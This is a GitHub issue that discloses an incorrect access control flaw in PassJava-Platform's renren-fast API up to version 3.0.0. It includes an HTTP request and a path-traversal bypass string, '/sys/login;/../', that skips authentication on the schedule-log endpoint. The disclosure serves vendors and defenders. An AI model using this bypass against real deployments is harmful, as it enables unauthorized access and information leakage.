PassJava-Platform icon indicating copy to clipboard operation
PassJava-Platform copied to clipboard
verified publisher icon Jackson0714

There is an Incorrect Access Control vulnerability in PassJava-Platform

Open RacerZ-fighting opened this issue 9 months ago • 0 comments

[Suggested description] PassJava-Platform renren-fast was found to have an Incorrect Access Control vulnerability up to 3.0.0, resulting in information leakage.

[Vulnerability Type] Incorrect access control

[Vendor of Product] https://github.com/Jackson0714/PassJava-Platform

[Affected Product Code Base] all version (<= 3.0.0)

[Affected Component] renren-fast /sys/scheduleLog/info API that require authentication

[Attack Type] Remote

[Vulnerability details] Directly send the payload below to the API /renren-fast/sys/scheduleLog/info/1 will fail because of the authentication.

POST /renren-fast/sys/scheduleLog/info/1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:8080
Connection: keep-alive
Cookie: JSESSIONID=6A54110114F288E6F7FC6AC6C7D23772
Image

However, send the payload below to the API /renren-fast/sys/login;/../scheduleLog/info/1 will bypass the authentication.

Image

RacerZ-fighting avatar Mar 17 '25 12:03 RacerZ-fighting